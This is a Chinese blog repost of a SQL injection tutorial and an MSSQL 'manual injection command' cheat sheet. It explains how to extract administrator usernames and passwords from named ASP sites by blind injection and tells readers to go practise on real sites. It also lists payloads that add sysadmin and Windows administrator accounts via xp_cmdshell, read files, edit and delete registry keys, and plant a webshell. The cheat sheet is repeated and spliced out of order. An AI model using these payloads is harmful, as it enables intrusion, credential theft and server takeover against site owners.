博客
关于我
强烈建议你试试无所不能的chatGPT,快点击我
SQL注入分析(手动注入检测) and 手动注入脚本命令精华版
阅读量:2429 次
发布时间:2019-05-10

本文共 7636 字,大约阅读时间需要 25 分钟。

SQL注入分析(手动注入检测) and 手动注入脚本命令精华版

入侵过程主要包括以下几个步骤:1、测试ASP系统是否有注入漏洞;2、获取数据库表名;3、测试管理

员ID;4、测试管理员用户名长度和管理员密码长度;5、从高到低依次测试出管理员用户名和密码。

   测试ASP系统是否有注入漏洞 这很关键,没有漏洞的网站你就别瞎忙了。方法也很简单,打开ASP网

站一个分类网页,如盗帅下载系统中的/list.asp?id=11和逸风系统中的/class.asp?id=18等,在其后面

分别加入and 1=1 和and 1=2进行测试,具体形式为

     /list.asp?id=11 and 1=1 (以下各测试语句都用同样的形式加入,TTY将不再说明)
    注意空格。在IE浏览器里空格将自动转换为%20。如果输入and 1=1 能正常显示原页面内容,输入

and 1=2不能正常显示原页面内容,就说明有SQL注入漏洞了,可以进行下面的步骤。

   测试数据库表名 一个数据库里一般有很多表,我们要找到存放管理员用户名和密码的表。对于已知

类型的ASP系统来说,可以到网上去下载一个压缩包,用辅臣数据库浏览器打开数据库查看就可以了,一

般都是admin。无论是否知道表名,都加以下语句测试一下:

and 0<>(select count(*) from admin)

   如果能返回正常页面,说明表名就是admin,否则继续换表名测试。;

   测试管理员ID 一般网站的管理员不是很多的,ID也不是很大,依次用1、2、3 ... ... 测试,很快

就能测到,具体测试语句为:

and (select count(*) from admin where id=1)

  变换最后的数字1进行测试,直到能正常返回原页面为止。

  测试管理员用户名长度和管理员密码长度 这很重要,不知道用户名和密码是几位数下面的工作就无法

进行。

用户名长度:  and (select count(*) from admin where id=5 and len(username)=4)

密码长度:  and (select count(*) from admin where id=5 and len(pws)=4)

  需要注意的是,表里存放用户名的字段username和存放密码的字段pws需要打开数据库进行确认。

  最后测试出管理员用户名和密码 从高到低,依次一位一位的测试,直到测出为止:

正在测试用户名的第三位字母 :and (select count(*) from admin where id=5 and left

(username,3)='ttd')

正在测试第7位密码:and (select count(*) from admin where id=5 and left(pws,7)='1506411')

   好了,如果操作无误的话,你就可以测试出正确的用户名和密码了。马上到网上去找一个盗帅下载系

统或逸风网站系统练习吧!

   对于新手来说,上面的方法可以看成是学习注入原理,实际操作起来是非常累人的,且不说语句是否

正确、熟练掌握,单就马拉松式的测试用户名和密码就能累死你,每一位,如果是数字要测试10次,如

果是字母要测试26次,如果哪位老兄用户名和密码都用上了的话,那你慢慢去测试吧,哈哈哈哈哈

 -------------------------------------

手动注入脚本命令精华版
作者:未知 来源:CnXHacker.Net 

1.判断是否有注入;and 1=1 ;and 1=2   

2.初步判断是否是mssql ;and user>0   

3.注入参数是字符’and [查询条件] and ’’=’   

4.搜索时没过滤参数的’and [查询条件] and ’%25’=’   

5.判断数据库系统   

;and (select count(*) from sysobjects)>0 mssql   
;and (select count(*) from msysobjects)>0 access   

6.猜数据库 ;and (select Count(*) from [数据库名])>0   

7.猜字段 ;and (select Count(字段名) from 数据库名)>0  1.判断是否有注入;and 1=1 ;and 1=2   

2.初步判断是否是mssql ;and user>0   

3.注入参数是字符’and [查询条件] and ’’=’   

4.搜索时没过滤参数的’and [查询条件] and ’%25’=’   

5.判断数据库系统   

;and (select count(*) from sysobjects)>0 mssql   
;and (select count(*) from msysobjects)>0 access   

6.猜数据库 ;and (select Count(*) from [数据库名])>0   

7.猜字段 ;and (select Count(字段名) from 数据库名)>0   

8.猜字段中记录长度 ;and (select top 1 len(字段名) from 数据库名)>0   

9.(1)猜字段的ascii值(access)   

;and (select top 1 asc(mid(字段名,1,1)) from 数据库名)>0   

(2)猜字段的ascii值(mssql)   

;and (select top 1 unicode(substring(字段名,1,1)) from 数据库名)>0   

10.测试权限结构(mssql)   

;and 1=(select IS_SRVROLEMEMBER(’sysadmin’));--   
;and 1=(select IS_SRVROLEMEMBER(’serveradmin’));--   
;and 1=(select IS_SRVROLEMEMBER(’setupadmin’));--   
;and 1=(select IS_SRVROLEMEMBER(’securityadmin’));--   
;and 1=(select IS_SRVROLEMEMBER(’diskadmin’));--   
;and 1=(select IS_SRVROLEMEMBER(’bulkadmin’));--   
;and 1=(select IS_MEMBER(’db_owner’));--   

11.添加mssql和系统的帐户   

;exec master.dbo.sp_addlogin username;--   

;exec master.dbo.sp_password null,username,password;--    

;exec master.dbo.sp_addsrvrolemember sysadmin username;--   

;exec master.dbo.xp_cmdshell ’net user username password    

/workstations:*/times:all/passwordchg:yes /passwordreq:yes /active:yes /add’;--   

;exec master.dbo.xp_cmdshell ’net user username password /add’;--    

;exec master.dbo.xp_cmdshell ’net localgroup administrators username /add’;--    

12.(1)遍历目录   

;create table dirs(paths varchar(100), id int)   

;insert dirs exec master.dbo.xp_dirtree ’c:/’   
;and (select top 1 paths from dirs)>0   
;and (select top 1 paths from dirs where paths not in(’上步得到的paths’))>)   

(2)遍历目录   

;create table temp(id nvarchar(255),num1 nvarchar(255),num2 nvarchar(255),num3 nvarchar

(255));--   

;insert temp exec master.dbo.xp_availablemedia;-- 获得当前所有驱动器   
;insert into temp(id) exec master.dbo.xp_subdirs ’c:/’;-- 获得子目录列表   
;insert into temp(id,num1) exec master.dbo.xp_dirtree ’c:/’;-- 获得所有子目录的目录树构  

 

;insert into temp(id) exec master.dbo.xp_cmdshell ’type c:/web/index.asp’;-- 查看文件的内

容   

13.mssql中的存储过程   

xp_regenumvalues 注册表根键, 子键   

;exec xp_regenumvalues ’HKEY_LOCAL_MACHINE’,’

SOFTWARE/Microsoft/Windows/CurrentVersion/Run’ 以多个记录集方式返回所有键值   

xp_regread 根键,子键,键值名   

;exec xp_regread   
’HKEY_LOCAL_MACHINE’,’SOFTWARE/Microsoft/Windows/CurrentVersion’,’CommonFilesDir’ 返

回制定键的值   

xp_regwrite 根键,子键, 值名, 值类型, 值   

值类型有2种REG_SZ 表示字符型,REG_DWORD 表示整型   
;exec xp_regwrite ’HKEY_LOCAL_MACHINE’,’SOFTWARE/Microsoft/Windows/CurrentVersion’,’

TestValueName’,’reg_sz’,’hello’ 写入注册表   

xp_regdeletevalue 根键,子键,值名   

exec xp_regdeletevalue ’HKEY_LOCAL_MACHINE’,’SOFTWARE/Microsoft/Windows/CurrentVersion’

,’TestValueName’ 删除某个值   

xp_regdeletekey ’HKEY_LOCAL_MACHINE’,’SOFTWARE/Microsoft/Windows/CurrentVersion/Testkey

’ 删除键,包括该键下所有值   

14.mssql的backup创建webshell    

use model   
create table cmd(str image);   
insert into cmd(str) values (’’);   
backup database model to disk=’c:/l.asp’;   

15.mssql内置函数   

;and (select @@version)>0 获得Windows的版本号   
;and user_name()=’dbo’ 判断当前系统的连接用户是不是sa   
;and (select user_name())>0 爆当前系统的连接用户   
;and (select db_name())>0 得到当前连接的数据库   

16.简洁的webshell   

use model   

create table cmd(str image);   

insert into cmd(str) values (’’);   

backup database model to disk=’g:/wwwtest/l.asp’; 

8.猜字段中记录长度 ;and (select top 1 len(字段名) from 数据库名)>0   

9.(1)猜字段的ascii值(access)   

;and (select top 1 asc(mid(字段名,1,1)) from 数据库名)>0   

(2)猜字段的ascii值(mssql)   

;and (select top 1 unicode(substring(字段名,1,1)) from 数据库名)>0   

10.测试权限结构(mssql)   

;and 1=(select IS_SRVROLEMEMBER(’sysadmin’));--   
;and 1=(select IS_SRVROLEMEMBER(’serveradmin’));--   
;and 1=(select IS_SRVROLEMEMBER(’setupadmin’));--   
;and 1=(select IS_SRVROLEMEMBER(’securityadmin’));--   
;and 1=(select IS_SRVROLEMEMBER(’diskadmin’));--   
;and 1=(select IS_SRVROLEMEMBER(’bulkadmin’));--   
;and 1=(select IS_MEMBER(’db_owner’));--   

11.添加mssql和系统的帐户   

;exec master.dbo.sp_addlogin username;--   

;exec master.dbo.sp_password null,username,password;--    

;exec master.dbo.sp_addsrvrolemember sysadmin username;--   

;exec master.dbo.xp_cmdshell ’net user username password    

/workstations:*/times:all/passwordchg:yes /passwordreq:yes /active:yes /add’;--   

;exec master.dbo.xp_cmdshell ’net user username password /add’;--    

;exec master.dbo.xp_cmdshell ’net localgroup administrators username /add’;--    

12.(1)遍历目录   

;create table dirs(paths varchar(100), id int)   

;insert dirs exec master.dbo.xp_dirtree ’c:/’   
;and (select top 1 paths from dirs)>0   
;and (select top 1 paths from dirs where paths not in(’上步得到的paths’))>)   

(2)遍历目录   

;create table temp(id nvarchar(255),num1 nvarchar(255),num2 nvarchar(255),num3 nvarchar

(255));--   

;insert temp exec master.dbo.xp_availablemedia;-- 获得当前所有驱动器   
;insert into temp(id) exec master.dbo.xp_subdirs ’c:/’;-- 获得子目录列表   
;insert into temp(id,num1) exec master.dbo.xp_dirtree ’c:/’;-- 获得所有子目录的目录树构  

 

;insert into temp(id) exec master.dbo.xp_cmdshell ’type c:/web/index.asp’;-- 查看文件的内

容   

13.mssql中的存储过程   

xp_regenumvalues 注册表根键, 子键   

;exec xp_regenumvalues ’HKEY_LOCAL_MACHINE’,’

SOFTWARE/Microsoft/Windows/CurrentVersion/Run’ 以多个记录集方式返回所有键值   

xp_regread 根键,子键,键值名   

;exec xp_regread   
’HKEY_LOCAL_MACHINE’,’SOFTWARE/Microsoft/Windows/CurrentVersion’,’CommonFilesDir’ 返

回制定键的值   

xp_regwrite 根键,子键, 值名, 值类型, 值   

值类型有2种REG_SZ 表示字符型,REG_DWORD 表示整型   
;exec xp_regwrite ’HKEY_LOCAL_MACHINE’,’SOFTWARE/Microsoft/Windows/CurrentVersion’,’

TestValueName’,’reg_sz’,’hello’ 写入注册表   

xp_regdeletevalue 根键,子键,值名   

exec xp_regdeletevalue ’HKEY_LOCAL_MACHINE’,’SOFTWARE/Microsoft/Windows/CurrentVersion’

,’TestValueName’ 删除某个值   

xp_regdeletekey ’HKEY_LOCAL_MACHINE’,’SOFTWARE/Microsoft/Windows/CurrentVersion/Testkey

’ 删除键,包括该键下所有值   

14.mssql的backup创建webshell    

use model   
create table cmd(str image);   
insert into cmd(str) values (’’);   
backup database model to disk=’c:/l.asp’;   

15.mssql内置函数   

;and (select @@version)>0 获得Windows的版本号   
;and user_name()=’dbo’ 判断当前系统的连接用户是不是sa   
;and (select user_name())>0 爆当前系统的连接用户   
;and (select db_name())>0 得到当前连接的数据库   

16.简洁的webshell   

use model   

create table cmd(str image);   

insert into cmd(str) values (’’);   

backup database model to disk=’g:/wwwtest/l.asp’;

 

转载地址:http://rcpmb.baihongyu.com/

你可能感兴趣的文章
假如从餐饮店的角度来看架构…
查看>>
这个充电宝太黑科技了,又小又不用自己带线,长见识了~
查看>>
HDC.2019后再发力,AppGallery Connect服务新升级
查看>>
网易云音乐热评的规律,44万条数据告诉你
查看>>
超神!GitHub 标星 5.5w,如何用 Python 实现所有算法?
查看>>
扛住100亿次请求——如何做一个“有把握”的春晚红包系统
查看>>
在北京看场雪为什么这么难?
查看>>
新年了,5G手机芯片,到底买谁?
查看>>
疫情之下「在家办公模式」开启,你该选择哪些远程协同工具?
查看>>
如何使用pdpipe与Pandas构建管道?
查看>>
远程办公的33种预测
查看>>
阿里巴巴架构师:十问业务中台和我的答案
查看>>
华为云发布三类六款计算实例 打造更强云端计算能力
查看>>
PHP 语言地位遭受挑战,PHP 程序员路在何方?
查看>>
PostgreSQL好评如潮,它是如何做到的?
查看>>
2017码云群英会,共享开源技术盛宴
查看>>
看完这份参会指南,Get 2017 OSC 年终盛典正确参会姿势!
查看>>
盛食厉兵 中科天玑挖掘大数据价值助力行业数字化转型
查看>>
白鹭引擎正式支持微信小游戏开发
查看>>
2018年,你所不知道的Jira!
查看>>